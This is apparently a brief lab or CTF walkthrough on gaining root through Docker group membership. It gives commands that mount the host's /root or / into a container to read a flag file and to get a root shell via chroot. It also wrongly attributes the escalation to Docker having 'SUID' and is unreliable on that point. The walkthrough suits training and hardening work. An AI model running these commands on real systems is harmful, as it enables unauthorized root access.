SUID Docker


install docker using this:

after the installation is completed add a new user for this test and add it to the docker group

adduser test

usermod -aG docker test

Now ssh to the target with the new user

we have access to the docker group

to test this run docker hello-world default image

docker run hello-world

what just happened was docker client connected to docker daemon and the daemon pulled the "hello-world" image from docker hub. then it created a nre container from that image and ran it. then the daemon streamed the output "Hello from Docker!" to docker client which sent it to the terminal.


To gain a root shell, we can do this with another image like an ubuntu container:

docker run ubuntu

one of dockers features is that it can mount a directory from the host system to a directory in the container for quick file grabbing.

docker run -v /root:/mnt ubuntu cat /mnt/flag.txt

By using the -v flag we specified a volume to mount, in this case the /root directory on the host was mounted to the /mnt directory on the container. Because docker has SUID we were able to mount a root owned directory in our container!

we can get a shell using the same technique combined with the chroot command

docker run -it -v /:/mnt ubuntu chroot /mnt

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